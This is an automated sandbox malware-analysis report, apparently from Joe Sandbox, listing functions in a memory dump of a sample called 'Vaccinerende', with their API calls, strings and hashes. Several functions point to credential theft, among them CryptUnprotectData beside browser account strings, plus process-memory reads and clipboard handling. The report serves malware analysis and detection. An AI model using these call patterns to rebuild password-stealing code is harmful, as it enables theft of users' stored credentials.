                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                            Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                            • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                            Function 00415308 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                            • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                            • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                            • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D

                                            Non-executed Functions

                                            Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • EmptyClipboard.USER32 ref: 004098EC
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                            • GlobalLock.KERNEL32(00000000), ref: 00409927
                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                            • GetLastError.KERNEL32 ref: 0040995D
                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                            • GetLastError.KERNEL32 ref: 00409974
                                            • CloseClipboard.USER32 ref: 0040997D
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                            • String ID:
                                            • API String ID: 3604893535-0
                                            • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                            • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                            • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                            • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                            Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                            • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$AddressFreeLoadMessageProc
                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                            • API String ID: 2780580303-317687271
                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                            Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTime.KERNEL32(?), ref: 00418836
                                            • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                            • GetCurrentProcessId.KERNEL32 ref: 00418856
                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                            • GetTickCount.KERNEL32 ref: 0041887D
                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                            • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                            • String ID:
                                            • API String ID: 4218492932-0
                                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                            Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • EmptyClipboard.USER32 ref: 00409882
                                            • wcslen.MSVCRT ref: 0040988F
                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                            • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                            • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                            • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                            • CloseClipboard.USER32 ref: 004098D7
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                            • String ID:
                                            • API String ID: 1213725291-0
                                            • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                            • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                            • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                            • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                            Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32 ref: 004182D7
                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                            • LocalFree.KERNEL32(?), ref: 00418342
                                            • free.MSVCRT ref: 00418370
                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                            • String ID: OsError 0x%x (%u)
                                            • API String ID: 2360000266-2664311388
                                            • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                            • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                            Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@??3@memcpymemset
                                            • String ID:
                                            • API String ID: 1865533344-0
                                            • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                            • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                            • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                            • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                            Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: NtdllProc_Window
                                            • String ID:
                                            • API String ID: 4255912815-0
                                            • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                            • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                            • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                            • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                            Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                            Download Yara Rule
                                            APIs
                                            • _wcsicmp.MSVCRT ref: 004022A6
                                            • _wcsicmp.MSVCRT ref: 004022D7
                                            • _wcsicmp.MSVCRT ref: 00402305
                                            • _wcsicmp.MSVCRT ref: 00402333
                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                            • memset.MSVCRT ref: 0040265F
                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                            • API String ID: 2929817778-1134094380
                                            • Opcode ID: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                            • Opcode Fuzzy Hash: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                            Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                            • String ID: :stringdata$ftp://$http://$https://
                                            • API String ID: 2787044678-1921111777
                                            • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                            • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                            Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                            • GetDC.USER32 ref: 004140E3
                                            • wcslen.MSVCRT ref: 00414123
                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                            • _snwprintf.MSVCRT ref: 00414244
                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                            • String ID: %s:$EDIT$STATIC
                                            • API String ID: 2080319088-3046471546
                                            • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                            • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                            Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • EndDialog.USER32(?,?), ref: 00413221
                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                            • memset.MSVCRT ref: 00413292
                                            • memset.MSVCRT ref: 004132B4
                                            • memset.MSVCRT ref: 004132CD
                                            • memset.MSVCRT ref: 004132E1
                                            • memset.MSVCRT ref: 004132FB
                                            • memset.MSVCRT ref: 00413310
                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                            • memset.MSVCRT ref: 004133C0
                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                            • wcscpy.MSVCRT ref: 0041341F
                                            • _snwprintf.MSVCRT ref: 0041348E
                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                            • SetFocus.USER32(00000000), ref: 004134B7
                                            Strings
                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                            • {Unknown}, xrefs: 004132A6
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                            • API String ID: 4111938811-1819279800
                                            • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                            • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                            Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                            • EndDialog.USER32(?,?), ref: 0040135E
                                            • DeleteObject.GDI32(?), ref: 0040136A
                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                            • ShowWindow.USER32(00000000), ref: 00401398
                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                            • String ID:
                                            • API String ID: 829165378-0
                                            • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                            • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                            Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00404172
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
